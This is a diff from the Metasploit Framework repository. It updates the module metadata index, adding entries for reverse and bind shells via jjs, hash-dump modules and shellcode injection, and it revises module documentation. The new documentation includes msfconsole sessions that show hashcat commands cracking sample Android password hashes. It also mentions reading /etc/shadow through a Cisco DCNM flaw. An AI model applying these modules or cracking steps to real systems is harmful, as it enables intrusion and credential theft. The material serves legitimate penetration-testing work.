-    "mod_time": "2019-05-22 17:16:06 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -138865,7 +139950,7 @@
    "targets": [
      "win x64"
    ],
-    "mod_time": "2018-10-11 17:23:59 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue_win8",
@@ -138921,7 +140006,7 @@
      "Native upload",
      "MOF upload"
    ],
-    "mod_time": "2019-05-22 20:05:44 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_psexec",
@@ -141920,7 +143005,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-17 19:28:07 +0000",
+    "mod_time": "2019-12-18 12:11:56 +0000",
    "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/vax/shell_reverse_tcp",
@@ -143037,6 +144122,42 @@
    },
    "needs_cleanup": false
  },
+  "payload_cmd/unix/bind_jjs": {
+    "name": "Unix Command Shell, Bind TCP (via jjs)",
+    "fullname": "payload/cmd/unix/bind_jjs",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Listen for a connection and spawn a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-21 16:38:18 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/bind_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_cmd/unix/bind_lua": {
    "name": "Unix Command Shell, Bind TCP (via Lua)",
    "fullname": "payload/cmd/unix/bind_lua",
@@ -143059,7 +144180,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -143771,6 +144892,42 @@
    },
    "needs_cleanup": false
  },
+  "payload_cmd/unix/reverse_jjs": {
+    "name": "Unix Command Shell, Reverse TCP (via jjs)",
+    "fullname": "payload/cmd/unix/reverse_jjs",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Connect back and create a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-21 16:38:18 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "payload_cmd/unix/reverse_ksh": {
    "name": "Unix Command Shell, Reverse TCP (via Ksh)",
    "fullname": "payload/cmd/unix/reverse_ksh",
@@ -144459,7 +145616,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 17:34:47 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_lua",
@@ -153311,7 +154468,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
    "path": "/modules/payloads/singles/windows/format_all_drives.rb",
    "is_install_path": true,
    "ref_name": "windows/format_all_drives",
@@ -153319,6 +154476,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "ShellcodeOfDeath"
+      ]
    },
    "needs_cleanup": false
  },
@@ -160474,6 +161634,41 @@
    },
    "needs_cleanup": null
  },
+  "post_android/gather/hashdump": {
+    "name": "Android Gather Dump Password Hashes for Android Systems",
+    "fullname": "post/android/gather/hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "h00die",
+      "timwr"
+    ],
+    "description": "Post Module to dump the password hashes for Android System. Root is required.\n           To perform this operation, two things are needed.  First, a password.key file\n           is required as this contains the hash but no salt.  Next, a sqlite3 database\n           is needed (with supporting files) to pull the salt from.  Combined, this\n           creates the hash we need.  Samsung based devices change the hash slightly.",
+    "references": [
+      "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
+      "URL-https://hashcat.net/forum/thread-2202.html"
+    ],
+    "platform": "Android",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-17 13:44:19 +0000",
+    "path": "/modules/post/android/gather/hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "android/gather/hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_android/gather/sub_info": {
    "name": "extracts subscriber info from target device",
    "fullname": "post/android/gather/sub_info",
@@ -160709,6 +161904,39 @@
    },
    "needs_cleanup": null
  },
+  "post_bsd/gather/hashdump": {
+    "name": "BSD Dump Password Hashes",
+    "fullname": "post/bsd/gather/hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Post module to dump the password hashes for all users on a BSD system.",
+    "references": [
+
+    ],
+    "platform": "BSD",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-02 08:54:04 +0000",
+    "path": "/modules/post/bsd/gather/hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "bsd/gather/hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_cisco/gather/enum_cisco": {
    "name": "Cisco Gather Device General Information",
    "fullname": "post/cisco/gather/enum_cisco",
@@ -163052,7 +164280,8 @@
    "disclosure_date": null,
    "type": "post",
    "author": [
-      "Dhiru Kholia <dhiru@openwall.com>"
+      "Dhiru Kholia <dhiru@openwall.com>",
+      "Henry Hoggard"
    ],
    "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n        machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).",
    "references": [
@@ -163064,7 +164293,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-28 10:16:59 +0000",
+    "mod_time": "2019-12-05 08:46:56 +0000",
    "path": "/modules/post/multi/gather/gpg_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/gpg_creds",
@@ -163664,7 +164893,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-04 19:24:43 +0000",
    "path": "/modules/post/multi/gather/ssh_creds.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/ssh_creds",
@@ -163934,7 +165163,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-06 12:45:23 +0000",
    "path": "/modules/post/multi/manage/autoroute.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/autoroute",
@@ -164437,7 +165666,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-10-28 03:24:20 +0000",
+    "mod_time": "2019-12-13 10:51:58 +0000",
    "path": "/modules/post/multi/recon/local_exploit_suggester.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/local_exploit_suggester",
@@ -165817,7 +167046,7 @@
    "author": [
      "Danil Bazin <danil.bazin@hsc.fr>"
    ],
-    "description": "This module enumerates ways to decrypt bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
+    "description": "This module enumerates ways to decrypt Bitlocker volume and if a recovery key is stored locally\n        or can be generated, dump the Bitlocker master key (FVEK)",
    "references": [
      "URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc",
      "URL-http://www.hsc.fr/ressources/outils/dislocker/"
@@ -165828,7 +167057,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-12-11 13:39:25 +0000",
    "path": "/modules/post/windows/gather/bitlocker_fvek.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bitlocker_fvek",
@@ -167739,7 +168968,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate all installed applications",
+    "description": "This module will enumerate all installed applications on a Windows system",
    "references": [

    ],
@@ -167749,7 +168978,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 14:10:48 +0000",
    "path": "/modules/post/windows/gather/enum_applications.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_applications",
@@ -168254,7 +169483,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-16 04:07:01 +0000",
    "path": "/modules/post/windows/gather/enum_hostfile.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_hostfile",
@@ -168420,7 +169649,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-02 15:33:48 +0000",
+    "mod_time": "2019-12-14 15:58:45 +0000",
    "path": "/modules/post/windows/gather/enum_patches.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_patches",
@@ -169126,7 +170355,7 @@
    "path": "/modules/post/windows/gather/local_admin_search_enum.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/local_admin_search_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -170999,6 +172228,39 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/shellcode_inject": {
+    "name": "Windows Manage Memory Shellcode Injection Module",
+    "fullname": "post/windows/manage/shellcode_inject",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "phra <https://iwantmore.pizza>"
+    ],
+    "description": "This module will inject into the memory of a process a specified shellcode.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-12-12 15:19:17 +0000",
+    "path": "/modules/post/windows/manage/shellcode_inject.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/shellcode_inject",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/sticky_keys": {
    "name": "Sticky Keys Persistance Module",
    "fullname": "post/windows/manage/sticky_keys",
@@ -56,7 +56,7 @@ All of the leaked versions are available in the module

 `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/admin/cisco/cisco_asa_extrabacon`
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 Cisco Data Center Network Manager exposes a servlet to download files on /fm/downloadServlet.
 An authenticated user can abuse this servlet to download arbitrary files as root by specifying
@@ -8,21 +8,7 @@ This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and
 work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
 (see References to understand why), on the other versions it abuses CVE-2019-1619 to bypass authentication.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld
-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb
-https://seclists.org/fulldisclosure/2019/Jul/7
-
-
-## Usage
+## Scenarios

 Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy!

@@ -8,7 +8,7 @@ Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain a
 4. Do: ```set CMD [command]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.

 ## Verification Steps
@@ -8,7 +10,7 @@ This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200
 4. Do: ```set FILENAME [filename]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_fpt
@@ -8,7 +8,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
 4. Do: ```set CMD [COMMAND]```
 5. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec
@@ -9,7 +9,7 @@ This module exploits an access control vulnerability in Cambium ePMP device mana
 5. Do: ```set NEW_PASSWORD newpass```
 6. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use use auxiliary/scanner/http/epmp1000_reset_pass
@@ -15,7 +15,7 @@ attacker on the local network can send a crafted request to broadcast a fake vid

 Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.

-## Sample Output
+## Scenarios

 ```
 msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options

@@ -0,0 +1,266 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode mobile (Android)
+  based password hashes, such as:
+
+  * `android-sha1` based passwords
+  * `android-samsung-sha1` based passwords
+  * `android-md5` based passwords
+
+  Formats:
+
+| Common               | John | Hashcat |
+|----------------------| -----|---------|
+| android-md5          | n/a  | 10      |
+| android-samsung-sha1 | n/a  | 5800    |
+| android-sha1         | n/a  | 110     |
+
+  Sources of hashes can be found here:
+  [source](https://hashcat.net/forum/thread-2202.html)
+
+## Verification Steps
+
+  1. Have at least one user with a `android-sha1`, `android-samsung-sha1`, or `android-md5` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_mobile```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **hashcat**
+
+   Use hashcat (default).
+
+## Options
+
+   **MD5**
+
+   Crack `android-md5` based passwords.  Default is `true`
+
+   **SHA1**
+
+   Crack `android-sha1` (non-samsung) based passwords.  Default is `true`
+
+   **SAMSUNG**
+
+   Crack `android-samsung-sha1` based passwords.  Default is `true`
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+msf5 post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+msf5 post(android/gather/hashdump) > previous
+msf5 auxiliary(analyze/crack_mobile) > set showcommand true
+showcommand => true
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191112-9775-19hbg7j
+[*] Wordlist file written out to /tmp/jtrtmp20191112-9775-f3q0r1
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191112-9775-19hbg7j ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191112-9775-19hbg7j
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191112-9775-19hbg7j /tmp/jtrtmp20191112-9775-f3q0r1
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 98     android-sha1  androidsha1  1234              Pin
+
+[*] Auxiliary module execution completed
+
+```
+
+### MD5, SHA1, SAMSUNG
+
+Create a password with each type, passwords are all `1234`.
+
+```
+msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
+msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
+msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
+```
+
+```
+msf5 > use auxiliary/analyze/crack_mobile
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7
+[*] Wordlist file written out to /tmp/jtrtmp20191113-29506-aq6ph7
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 127    android-sha1  androidsha1  1234              Pin
+
+[*] Checking android-samsung-sha1 hashes already cracked...
+[*] Cracking android-samsung-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+
+[*] Checking android-md5 hashes already cracked...
+[*] Cracking android-md5 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+ 128    android-md5           androidmd5   1234              Pin
+
+[*] Auxiliary module execution completed
+```
@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.

 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:

 http://freecarrierlookup.com/

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th

 And you're good to go.

-## Demonstration
+## Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.

 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.

-## Module Options
+## Options

 **CELLNUMBERS**

@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.

 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.

-## Supported Carrier Gateways
+### Supported Carrier Gateways

 The module supports the following carriers:

@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.

-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number

 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/

 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.

-## Gmail SMTP Example
+### Gmail SMTP Example

 Gmail is a popular mail server, so we will use this as a demonstration.

@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex

 And you should be ready to go.

-## Yahoo SMTP Example
+### Yahoo SMTP Example

 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t

 And you're good to go.

-## Demonstration
+### Scenarios

 After setting up your mail server and the module, your output should look similar to this:

@@ -3,7 +3,7 @@ This module triggers a Denial of Service vulnerability in the Flexense Enterpris
 a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  


-## Vulnerable Application 
+## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
@@ -15,7 +15,7 @@ Vulnerable app versions include:

 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

-## Verification
+## Verification Steps

 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
